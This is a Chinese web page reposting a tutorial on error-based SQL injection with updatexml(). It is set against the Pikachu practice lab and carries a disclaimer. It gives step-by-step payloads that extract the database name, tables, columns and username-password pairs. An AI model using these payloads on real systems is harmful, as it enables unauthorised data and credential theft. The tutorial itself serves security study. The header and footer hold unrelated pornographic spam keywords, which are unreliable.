国产成人精品久久免费动漫-国产成人精品天堂-国产成人精品区在线观看-国产成人精品日本-a级毛片无码免费真人-a级毛片毛片免费观看久潮喷

您的位置:首頁技術(shù)文章
文章詳情頁

詳解SQL報(bào)錯(cuò)盲注

瀏覽:21日期:2023-03-06 14:25:14
目錄
  • 一、SQL報(bào)錯(cuò)函數(shù)詳解
  • 二、SQL報(bào)錯(cuò)盲注payload構(gòu)造
    • 1、updatexml語句構(gòu)造思路
    • 2、查詢當(dāng)前數(shù)據(jù)庫
    • 3、查詢表名
    • 4、查詢列名
    • 5、查詢字段名
    • 6、查詢數(shù)據(jù)

今天繼續(xù)給大家介紹Linux運(yùn)維相關(guān)知識(shí),本文主要內(nèi)容是SQL報(bào)錯(cuò)盲注詳解。

免責(zé)聲明:
本文所介紹的內(nèi)容僅做學(xué)習(xí)交流使用,嚴(yán)禁利用文中技術(shù)進(jìn)行非法行為,否則造成一切嚴(yán)重后果自負(fù)!
再次強(qiáng)調(diào):嚴(yán)禁對(duì)未授權(quán)設(shè)備進(jìn)行滲透測(cè)試!

一、SQL報(bào)錯(cuò)函數(shù)詳解

updatexml();floor();extractvalue();等函數(shù)都可以用于構(gòu)造SQL報(bào)錯(cuò)函數(shù),今天我們主要來講解使用updatexml()函數(shù)。
updatexml()函數(shù)使用格式如下:

updatexml(XML_document,XPath_string,new_value)

XML_document是String格式的XML文檔名稱,XPath_string是XPath格式的字符串,new_value是String格式的而字符串,用于替換查找到的符合條件的數(shù)據(jù)。
該函數(shù)有一個(gè)特性,即如果XPath_string不是XPath格式的字符串,就會(huì)報(bào)錯(cuò)并顯示處XPath的值,因此,我們可以利用這一特性實(shí)現(xiàn)SQL報(bào)錯(cuò)盲注。此外,我們還可以利用updatexml()函數(shù)的特性,實(shí)現(xiàn)在SQL插入、刪除等語句中的SQL注入。

二、SQL報(bào)錯(cuò)盲注payload構(gòu)造

1、updatexml語句構(gòu)造思路

updatexml()函數(shù)的構(gòu)造,首先需要閉合SQL語句中的冒號(hào)、括號(hào)。其次還需要使用and或者or語句連接成一個(gè)單獨(dú)的語句,這樣即可成功執(zhí)行updatexml()函數(shù)中的語句。
下面,我以皮卡丘靶場(chǎng)為例,來簡(jiǎn)單介紹一下updatexml報(bào)錯(cuò)注入payload的構(gòu)造思路,皮卡丘靶場(chǎng)SQL insert/update型注入頁面如下所示:

從上圖中可以看出,該頁面功能上是提供人員的注冊(cè),因此可以猜測(cè)其內(nèi)部是insert類型的SQL語句,因此我們可以在手機(jī)、住址等列(一般不要選擇密碼,因?yàn)楹芏嗑W(wǎng)站都會(huì)把密碼進(jìn)行md5處理,從而導(dǎo)致我們的updatexml失效)中插入我們的updatexml語句。通過簡(jiǎn)單的實(shí)驗(yàn)可以得知,該站點(diǎn)的注入閉合為單引號(hào),因此payload的構(gòu)造格式為:

12" or updatexml() or"

2、查詢當(dāng)前數(shù)據(jù)庫

當(dāng)我們確定updatexml()函數(shù)的格式后,我們就可以寫實(shí)際的payload語句了,相關(guān)命令如下所示:

12"or updatexml(1,concat(0x7e,database(),0x7e),0) or"

從上payload可以看出,updatexml()函數(shù)有三部分組成,我們需要把我們要執(zhí)行的SQL語句寫到第二部分,第二部分是一個(gè)concat()函數(shù),之所以要拼接0x7e是因?yàn)樵?6進(jìn)制字符是一個(gè)波浪線,也可以換成其他的字符。
該payload執(zhí)行結(jié)果如下所示:

從上圖可以看出,我們當(dāng)前的數(shù)據(jù)庫名為pikachu。

3、查詢表名

查詢表名的payload如下所示:

12" or updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e),0) or "

在上述payload中,concat中間的SQL語句要用括號(hào)括起來,然后寫入正常的查詢命令即可,該payload執(zhí)行結(jié)果如下所示:

從上圖可以看出,我們查詢到當(dāng)前數(shù)據(jù)庫存在一個(gè)名為httpinfo的表,如果我們更改limit的限制,那么我們可以得到更多的表。

4、查詢列名

查詢列名的payload如下所示:

12" or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name="users"),0x7e),0) or "

該payload構(gòu)造原理與以上類似,執(zhí)行結(jié)果如下所示:

5、查詢字段名

字段名查詢的payload如下所示:

12" or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name="users" and table_schema="pikachu"),0x7e),0) or "

該payload構(gòu)造原理與以上類似,執(zhí)行結(jié)果如下所示:

6、查詢數(shù)據(jù)

數(shù)據(jù)查詢的payload如下所示:

12" or updatexml(1,concat(0x7e,(select concat(username,"-",password) from users limit 0,1),0x7e),0) or "

該payload構(gòu)造原理與以上類似,執(zhí)行結(jié)果如下所示:

到此這篇關(guān)于SQL報(bào)錯(cuò)盲注詳解的文章就介紹到這了,更多相關(guān)SQL報(bào)錯(cuò)盲注內(nèi)容請(qǐng)搜索以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持!

標(biāo)簽: MsSQL
主站蜘蛛池模板: 久草勉费视频 | 国产一区二区免费不卡在线播放 | 国产手机精品一区二区 | 日本特级淫片免费 | 国产成人一区二区三区免费观看 | 国产一区二区三区亚洲综合 | 欧美国产成人在线 | 日韩成人在线视频 | 九九国产精品视频 | 国产欧美在线观看不卡 | 日本一级特黄啪啪片 | 一级毛片免费 | 蕾丝视频永久在线入口香蕉 | 欧美精品午夜久久久伊人 | 一本一道久久 | 一本久| 欧美一级特黄乱妇高清视频 | 亚洲精品自产拍在线观看 | 国产免费爱在线观看视频 | 波多野结衣被强在线视频 | 欧美一区二区三区在线观看免费 | 亚洲一区二区免费视频 | 成人精品一区二区久久久 | 看真人一级毛片 | 日本a级毛片免费视频播放 日本a级三级三级三级久久 | 国产精品免费久久 | www.av在线视频 | 一级淫 | 国产精品午夜国产小视频 | 亚洲在线观看免费视频 | 欧美三级不卡在线观看视频 | 国产亚洲自在精品久久 | 成人免费手机在线看网站 | 干欧美女人 | 美女拍拍拍爽爽爽爽爽爽 | 国产原创在线视频 | 在线看一级片 | 国产一级爱做片免费观看 | 美女插跳蛋视频叫爽 | 国内高清久久久久久久久 | 久久久一区二区三区不卡 |